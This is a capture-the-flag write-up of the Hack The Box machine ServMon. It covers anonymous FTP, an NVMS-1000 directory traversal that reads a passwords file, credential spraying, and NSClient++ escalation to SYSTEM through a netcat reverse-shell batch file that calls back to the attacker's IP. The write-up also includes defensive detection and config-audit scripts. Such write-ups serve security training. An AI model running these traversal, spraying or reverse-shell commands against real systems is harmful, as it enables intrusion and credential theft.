ServMon
Port scan
u505@naos:~/HTB/Machines/ServMon$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.184
[sudo] password for u505:

Starting masscan 1.0.5 at 2021-01-02 14:12:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 5666/tcp on 10.10.10.184
Discovered open port 6063/tcp on 10.10.10.184
Discovered open port 49667/tcp on 10.10.10.184
Discovered open port 49670/tcp on 10.10.10.184
Discovered open port 21/tcp on 10.10.10.184
Discovered open port 22/tcp on 10.10.10.184
Discovered open port 7680/tcp on 10.10.10.184
Discovered open port 49666/tcp on 10.10.10.184
Discovered open port 49665/tcp on 10.10.10.184
Discovered open port 49669/tcp on 10.10.10.184
Discovered open port 135/tcp on 10.10.10.184
Discovered open port 49668/tcp on 10.10.10.184
Discovered open port 139/tcp on 10.10.10.184
Discovered open port 5040/tcp on 10.10.10.184
Discovered open port 8443/tcp on 10.10.10.184
Discovered open port 49664/tcp on 10.10.10.184
Discovered open port 80/tcp on 10.10.10.184
Discovered open port 6699/tcp on 10.10.10.184
Discovered open port 445/tcp on 10.10.10.184

u505@naos:~/HTB/Machines/ServMon$ cat portsraw | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -n | while read port
> do
> printf $port","
> done
21,22,80,135,139,445,5040,5666,6063,6699,7680,8443,49664,49665,49666,49667,49668,49669,49670
u505@naos:~/HTB/Machines/ServMon$ nmap -p 21,22,80,135,139,445,5040,5666,6063,6699,7680,8443,49664,49665,49666,49667,49668,49669,49670 -sC -sV servmon
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 09:20 EST
Nmap scan report for servmon (10.10.10.184)
Host is up (0.046s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  11:05AM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|     AuthInfo:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  x11?
6699/tcp  open  napster?
7680/tcp  open  pando-pub?
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|     Sat:Saturday
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8m09s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-01-02T14:31:00
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.54 seconds
FTP enum
u505@naos:~/HTB/Machines/ServMon$ ftp servmon
Connected to servmon.
220 Microsoft FTP Service
Name (servmon:u505): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  11:05AM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  11:06AM       <DIR>          Nadine
01-18-20  11:08AM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  11:08AM                  174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.04 secs (4.0506 kB/s)
ftp> cd ..
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  11:06AM       <DIR>          Nadine
01-18-20  11:08AM       <DIR>          Nathan
226 Transfer complete.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  11:10AM                  186 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
186 bytes received in 0.04 secs (4.3762 kB/s)
ftp> quit
221 Goodbye.
u505@naos:~/HTB/Machines/ServMon$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
u505@naos:~/HTB/Machines/ServMon$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Web enum port 80
Dirsearch
u505@naos:~/HTB/Machines/ServMon$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,js,htm" -f -t 100 -u http://10.10.10.184
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: txt, js, htm | HTTP method: GET | Threads: 100 | Wordlist size: 23058
Error Log: /opt/utils/dirsearch/logs/errors-21-01-02_09-46-29.log
Target: http://10.10.10.184/
Output File: /opt/utils/dirsearch/reports/10.10.10.184/_21-01-02_09-46-29.txt
[09:46:29] Starting:
[09:46:32] 200 -  118B - /_js
[09:46:32] 200 -  118B - /_vti_txt
[09:46:35] 200 -  118B - /ad_js
[09:46:58] 200 -    1KB - /favicon.ico
[09:46:58] 200 -  118B - /feedback_js
[09:47:01] 200 -  118B - /gettxt
[09:47:04] 200 -  118B - /htm
[09:47:05] 200 -  340B - /Index.htm
[09:47:05] 200 -  340B - /index.htm
[09:47:08] 200 -  118B - /js
[09:47:16] 200 -  118B - /mytag_js
[09:47:17] 200 -    0B - /nul.js
[09:47:17] 200 -    0B - /nul.htm
[09:47:17] 200 -    0B - /nul.txt
[09:47:40] 200 -  118B - /txt
[09:47:46] 200 -  118B - /xajax_js
Task Completed
Exploit NVMS
u505@naos:~/HTB/Machines/ServMon$ searchsploit nvms
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrar | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Ove | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/ServMon$ searchsploit -m 47774
  Exploit: NVMS 1000 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/47774
     Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
File Type: UTF-8 Unicode text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/ServMon/47774.txt
u505@naos:~/HTB/Machines/ServMon$ cat 47774.txt
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
The NVMS-1000 application is vulnerable to directory traversal (LFI): a request that climbs above the web root with ../ sequences returns arbitrary files from the host.
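The flip side of that traversal, from the defender's seat: the following Python is an added example (not part of the original writeup) that flags traversal requests like the win.ini and passwords.txt reads above in constructed common-log-format access lines. It URL-decodes repeatedly and treats backslashes as separators before looking for a ".." segment, so the %2e%2e and double-encoded ..%255c variants that a naive "../" match misses are caught as well; the log lines and the log format are constructed for the example.

```python
"""Flag directory-traversal requests, such as the NVMS-1000 win.ini and
passwords.txt reads, in constructed web-server access logs."""
import re
from urllib.parse import unquote

# Constructed sample log lines (common log format); not real ServMon logs.
SAMPLE_LOG = """\
10.10.14.12 - - [02/Jan/2021:09:30:01 -0500] "GET /Pages/login.htm HTTP/1.1" 200 4123
10.10.14.12 - - [02/Jan/2021:09:31:12 -0500] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.12 - - [02/Jan/2021:09:35:40 -0500] "GET /../../../../../../../../../../../../users/nathan/desktop/passwords.txt HTTP/1.1" 200 156
10.10.14.12 - - [02/Jan/2021:09:36:02 -0500] "GET /%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 200 92
10.10.14.12 - - [02/Jan/2021:09:36:30 -0500] "GET /..%255c..%255c..%255cwindows/win.ini HTTP/1.1" 404 0
10.10.14.12 - - [02/Jan/2021:09:37:00 -0500] "GET /images/logo.png HTTP/1.1" 200 2044
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def normalize_path(raw: str) -> str:
    """Decode the request path the way a lenient server might: undo URL
    encoding repeatedly (catches %252e double encoding) and treat backslashes
    as path separators, which matters on Windows targets such as NVMS-1000."""
    path = raw
    for _ in range(3):  # bounded: a few decode rounds is enough, then stop
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(path: str) -> bool:
    """True when any path segment is '..', i.e. the request climbs above the web root."""
    return any(seg == ".." for seg in path.split("/"))


def find_traversal(log_text: str):
    """Return (source, timestamp, status, decoded path) for each traversal
    attempt; the status says whether the read most likely succeeded (200)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand; skip rather than guess
        path = normalize_path(m["path"])
        if is_traversal(path):
            hits.append((m["src"], m["ts"], int(m["status"]), path))
    return hits


if __name__ == "__main__":
    for src, ts, status, path in find_traversal(SAMPLE_LOG):
        verdict = "SUCCEEDED" if status == 200 else "blocked"
        print(f"{ts} {src} traversal {verdict}: {path}")
```

A 200 on a traversal path is the line to alert on; a 404 still shows someone probing the vulnerable product.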
Web enum port 8443
Dirsearch
u505@naos:~/HTB/Machines/ServMon$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,html" -f -t 100 -u https://10.10.10.184:8443
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: txt, html | HTTP method: GET | Threads: 100 | Wordlist size: 18446
Error Log: /opt/utils/dirsearch/logs/errors-21-01-02_09-54-38.log
Target: https://10.10.10.184:8443/
Output File: /opt/utils/dirsearch/reports/10.10.10.184/_21-01-02_09-54-38.txt
[09:54:38] Starting:
[09:54:44] 403 -   20B - /api/
[09:54:44] 403 -   20B - /api
[09:54:46] 200 -    0B - /aux.html
[09:54:54] 200 -    0B - /com2.html
[09:54:55] 200 -    0B - /com3.html
[09:54:55] 200 -    0B - /com1.html
[09:54:55] 200 -    0B - /con.html
[09:55:06] 403 -   20B - /exec/
[09:55:16] 200 -    5KB - /Index.html
[09:55:16] 200 -    5KB - /index.html
[09:55:23] 200 -    0B - /lpt1.html
[09:55:23] 200 -    0B - /lpt2.html
[09:55:30] 200 -    0B - /nul.html
[09:55:38] 200 -    0B - /prn.html
[09:55:41] 403 -   20B - /query/
Task Completed
User flag
LFI to read password file
Using the LFI, we can read Nathan's desktop, where Nadine left the Passwords.txt file.
u505@naos:~/HTB/Machines/ServMon$ telnet servmon 80
Trying 10.10.10.184...
Connected to servmon.
Escape character is '^]'.
GET /../../../../../../../../../../../../users/nathan/desktop/passwords.txt HTTP/1.1
Host: servmon
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$Connection closed by foreign host.
Find credentials
u505@naos:~/HTB/Machines/ServMon$ cat user.txt
nadine
nathan
u505@naos:~/HTB/Machines/ServMon$ cat password.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Try the list of users and passwords.
u505@naos:~/HTB/Machines/ServMon$ sudo crackmapexec smb 10.10.10.184/32 -u user.txt -p password.txt
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
Check the available shares.
u505@naos:~/HTB/Machines/ServMon$ sudo crackmapexec smb 10.10.10.184/32 -u nadine -p 'L1k3B1gBut7s@W0rk' --shares
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
SMB 10.10.10.184 445 SERVMON [+] Enumerated shares
SMB 10.10.10.184 445 SERVMON Share    Permissions  Remark
SMB 10.10.10.184 445 SERVMON -----    -----------  ------
SMB 10.10.10.184 445 SERVMON ADMIN$                Remote Admin
SMB 10.10.10.184 445 SERVMON C$                    Default share
SMB 10.10.10.184 445 SERVMON IPC$     READ         Remote IPC
List of users.
u505@naos:~/HTB/Machines/ServMon$ sudo crackmapexec smb 10.10.10.184/32 -u nadine -p 'L1k3B1gBut7s@W0rk' --rid-brute
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
SMB 10.10.10.184 445 SERVMON [+] Brute forcing RIDs
SMB 10.10.10.184 445 SERVMON 500: SERVMON\Administrator (SidTypeUser)
SMB 10.10.10.184 445 SERVMON 501: SERVMON\Guest (SidTypeUser)
SMB 10.10.10.184 445 SERVMON 503: SERVMON\DefaultAccount (SidTypeUser)
SMB 10.10.10.184 445 SERVMON 504: SERVMON\WDAGUtilityAccount (SidTypeUser)
SMB 10.10.10.184 445 SERVMON 513: SERVMON\None (SidTypeGroup)
SMB 10.10.10.184 445 SERVMON 1002: SERVMON\Nadine (SidTypeUser)
SMB 10.10.10.184 445 SERVMON 1003: SERVMON\sshd (SidTypeUser)
SMB 10.10.10.184 445 SERVMON 1004: SERVMON\Nathan (SidTypeUser)
SSH into the box and user flag
u505@naos:~/HTB/Machines/ServMon$ ssh nadine@servmon
nadine@servmon's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt <USER_FLAG>
Escalation via NSClient++
Searchsploit
u505@naos:~/HTB/Machines/ServMon$ searchsploit NSCLIENT
---------------------------------------------- ---------------------------------
 Exploit Title                                | Path
---------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Co | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation    | windows/local/46802.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/ServMon$ searchsploit -m 48360
  Exploit: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48360
     Path: /usr/share/exploitdb/exploits/json/webapps/48360.txt
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/ServMon/48360.txt
u505@naos:~/HTB/Machines/ServMon$ searchsploit -m 46802
  Exploit: NSClient++ 0.5.2.35 - Privilege Escalation
      URL: https://www.exploit-db.com/exploits/46802
     Path: /usr/share/exploitdb/exploits/windows/local/46802.txt
File Type: ASCII text, with very long lines, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/ServMon/46802.txt
These two exploits explain how to abuse the application to run a script as a privileged user. Both require the admin password.
Access web console
The following command provides the password.
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
But access to the web console is denied.
The password is stored in cleartext in the config file, and the same file shows why we are refused: only host 127.0.0.1 is allowed.
nadine@SERVMON c:\Users\Nadine>type "C:\Program Files\NSClient++\nsclient.ini"
# If you want to fill this file with all available options run the following command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
#   nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

...
We create an SSH tunnel so that our browser reaches the web console from 127.0.0.1, which satisfies the allowed hosts check.
u505@naos:~/HTB/Machines/ServMon$ ssh -L 8443:127.0.0.1:8443 nadine@servmon
nadine@servmon's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
Reverse shell
u505@naos:~/HTB/Machines/ServMon$ cp /opt/utils/nc.exe/nc64.exe ./
u505@naos:~/HTB/Machines/ServMon$ cat u505.bat
@echo off
date /T >> c:\temp\u505.log
time /T >> c:\temp\u505.log
c:\temp\nc64.exe 10.10.14.12 4444 -e cmd.exe
We create a batch file that calls home.
u505@naos:~/HTB/Machines/ServMon$ scp u505.bat nc64.exe nadine@10.10.10.184:/Temp/
nadine@10.10.10.184's password:
u505.bat                                      100%  111     2.1KB/s   00:00
nc64.exe                                      100%   44KB 235.2KB/s   00:00
We start a listener.
u505@naos:~/HTB/Machines/ServMon$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
In the NSClient++ web console, we create a new external command named u505 whose command line is our batch file.
Save the configuration.
Reload the daemon.
From the console, run our external script; the service executes it and the batch file connects back to our listener.
u505@naos:~/HTB/Machines/ServMon$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:49951.
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
whoami
whoami
nt authority\system
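The nsclient.ini read above and the external-script escalation just shown are the two things a defender would want to catch in that file. As an added example (not part of the original writeup, and not NSClient++'s own tooling), the following Python audits an nsclient.ini: it reports a cleartext web password, an allowed hosts list that names only loopback (which, as the SSH tunnel showed, keeps remote clients out but not a local account), and the CheckExternalScripts module. The sample INI is constructed from the excerpt above with a placeholder password; the [/modules] and [/settings/external scripts] entries are assumed for the example and are not shown on the page.

```python
"""Audit an NSClient++ nsclient.ini for the weaknesses this box relies on:
a cleartext web password readable by any local user, an 'allowed hosts'
list that only names loopback (walked around with an SSH port-forward),
and the external-scripts module that turns console access into SYSTEM."""
import configparser
import ipaddress

# Constructed sample modelled on the ServMon excerpt; the password is a
# placeholder and the [/modules] / external-scripts sections are assumed.
SAMPLE_INI = """\
; in flight - TODO
[/settings/default]
; Undocumented key
password = PLACEHOLDER_PASSWORD
; Undocumented key
allowed hosts = 127.0.0.1

[/modules]
WEBServer = enabled
CheckExternalScripts = enabled

[/settings/external scripts]
allow arguments = true
"""


def parse_ini(text: str) -> configparser.ConfigParser:
    """NSClient++ uses ';' and '#' comments, '/section/paths' and keys with
    spaces, all of which configparser accepts; interpolation is off so a
    '%' inside a password does not raise."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def is_loopback(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # not an IP literal; only 'localhost' counts as loopback
        return host.lower() == "localhost"


def audit(text: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    cp = parse_ini(text)

    def section(name):
        return cp[name] if cp.has_section(name) else {}

    default, modules = section("/settings/default"), section("/modules")
    ext = section("/settings/external scripts")
    findings = []
    if default.get("password"):
        findings.append("cleartext password in [/settings/default]: anyone who can "
                        "read nsclient.ini or run 'nscp web -- password --display' "
                        "gets the web console")
    hosts = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    if not hosts:
        findings.append("no 'allowed hosts' restriction on the web console")
    elif all(is_loopback(h) for h in hosts):
        findings.append("allowed hosts is loopback-only: keeps remote clients out, but "
                        "any local account with SSH can forward 8443 and arrive as 127.0.0.1")
    if modules.get("CheckExternalScripts", "").lower() == "enabled":
        findings.append("CheckExternalScripts enabled: console users can register "
                        "commands that run as the service account (SYSTEM here)")
        if ext.get("allow arguments", "").lower() == "true":
            findings.append("external scripts accept caller-supplied arguments")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_INI):
        print("-", finding)
```

The loopback finding is the one this box turns on: a host allow-list is not an authentication control when low-privileged users can log in over SSH and forward ports.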
Root flag
We could read the root flag from the reverse shell, but this time I will access it through Remote Desktop. First, change the administrator password from the SYSTEM shell.
net user administrator u505
net user administrator u505
The command completed successfully.
SSH as administrator.
u505@naos:~/HTB/Machines/ServMon$ ssh administrator@servmon
administrator@servmon's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

administrator@SERVMON C:\Users\Administrator\Desktop>whoami
servmon\administrator
Enable Remote Desktop and allow it through the firewall.
administrator@SERVMON C:\Users\Administrator\Desktop>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
administrator@SERVMON C:\Users\Administrator\Desktop>netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Updated 3 rule(s).
Ok.
Remote desktop into the machine
u505@naos:~$ xfreerdp servmon
[17:26:56:562] [17624:17624] [WARN][com.freerdp.client.common.cmdline] - Using deprecated command-line interface!
[17:26:56:562] [17624:17624] [WARN][com.freerdp.client.common.compatibility] - servmon -> /v:servmon
[17:26:56:562] [17624:17624] [WARN][com.freerdp.client.common.compatibility] -
[17:26:56:562] [17624:17625] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[17:26:56:562] [17624:17625] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[17:26:56:562] [17624:17625] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[17:26:56:562] [17624:17625] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[17:26:56:873] [17624:17625] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[17:26:56:880] [17624:17625] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[17:26:56:880] [17624:17625] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[17:26:57:069] [17624:17625] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[17:26:57:069] [17624:17625] [WARN][com.freerdp.crypto] - CN = ServMon
Username: administrator
Domain:
Password:
...
References
- https://docs.nsclient.org/howto/external_scripts/
- https://docs.nsclient.org/howto/run_commands/
- HOW TO ENABLE REMOTE DESKTOP USING COMMAND PROMPT ON WINDOWS 10
Daniel Simao 18:02, 2 January 2021 (EST)